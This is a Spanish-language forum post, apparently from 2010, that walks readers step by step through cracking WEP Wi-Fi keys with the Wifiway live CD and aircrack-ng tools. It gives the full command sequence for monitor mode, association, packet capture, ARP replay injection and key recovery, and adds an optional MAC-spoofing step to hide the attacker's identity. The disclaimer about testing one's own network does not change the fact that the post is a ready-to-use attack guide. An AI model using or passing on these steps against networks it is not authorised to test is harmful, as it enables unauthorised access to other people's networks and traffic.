Hola, mi primer aporte, espero que les guste
Antes de nada, este manual, lo saque de seguridadwireless.net (creo, ya de tanto leer no estoy seguro) y creo que esta creado por dexterback, yo no voy a hacer copy and paste(explicare todo lo que pueda), lei muxos pero este realmente merece la pena, a mi me funciono.
Yo he usado una tarjeta wifi intel wifi link 5100 AGN. He usado el wifiway 1.0 en live cd. ESTE MANUAL ES PARA COMPROBAR LA SEGURIDAD DE SUS REDES, NO ME HAGO RESPONSABLE DE LO QUE HAGAN. Va dirigido a las contraseñas wep de las redes wifi, yo les aconsejo usar wpa.
Rompiendo contraseñas wep con wifiway 1.0:
1.- Arrancamos wifiway, y usando las herramientas que nos ofrece anotamos el bssid y el ssid ademas de ver el canal en el que se encuentra.
2.- Creamos un archivo con el editor de texto
Código:
network={
ssid="ESSID"
key_mgmt=NONE
bssid=BSSID
wep_key0="232323343478787"
}
Explico esto: las comillas que veis en el código se dejan, ejemplos de ESSID=WLAN_31 BSSID=00:13:2D:3F:46:5S (me los he inventado) y el wep_key0 da igual los numeros, es una clave cualquiera
Y le ponemos el nombre wpa.conf (IMPORTANTE, ACORDAROS DE LA RUTA DONDE LO GUARDAIS)
3.- Abrimos terminal y ponemos:
airmon-ng start wlan0 channel X
la X es el numero del canal, no pongais X, esto sirve para poner la targeta en modo monitor, en el canal que esta la red
4.- Ponemos el codigo:
wpa_supplicant -c/LARUTA/wpa.conf -Dwext -iwlan0
Esto sirve para asociarnos, a veces da un error, paramos con ctrl+c y lo volvemos a poner
5.- Nuevo terminal y ponemos:
airodump-ng -w nuevowifi -c X mon0
Esto es para capturar trafico, yo pongo nuevowifi, vosotros podeis poner otro nombre
6.- Nuevo terminal y ponemos:
aireplay-ng -3 -b (su mac) -h (vuestra mac) mon0
Esto es para inyectar, su mac es = que el BSSID, vuestra mac la podeis ver, en windows escribir "ipconfig /all"
7.-Cuando tengamos bastantes datas, importante datas no mires a los beacons (lo que yo hacia al principio), escribimos:
aircrack-ng -z *.cap
En otro terminal claro esta, si necesita mas datas nos lo dice. Y tendremos la contraseña, a mi me aparecia en hex y en ASCII, si solo os sale en hex podeis vuscar un traductor
OPCIONAL
si quereis ocultar vuestra mac, entre los pasos 1 y 2 realizamos esto:
A.- ifconfig wlan0 down
B.- macchanger -m 00:11:22:33:44:55
C.- ifconfig wlan0 up
Y seguimos con el paso 3
POSIBLE PROBLEMA:
Si teneis un botoncito o una llavecita que se desplaza para aztivar el wifi, muy problablemente no os vaya en wifiway, como me pasaba a mi. Solucion, entre los iconos que aparecen en el escritorio, (ahora no recuerdo mu bien el nombre editare el post), hay uno que nos da la opcion [up] y [down], pulsamos la tecla(o desplazamos la llave) y le damos a ese boton, y se encenderá. Yo lo descubri de chiripa xdxdxd
Espero que os haya gustado, si hay dudas en el post y ya respondere si se la respuesta. Ante cualquier error por favor decirmelo en el post(se aceptan criticas, a ser posible constructivas). Perdon por las posibles faltas de ortografia.
Aaaaaaaaadios.
Sudafrica 2010
################################
################################
################################
################################
################################
################################
################################
################################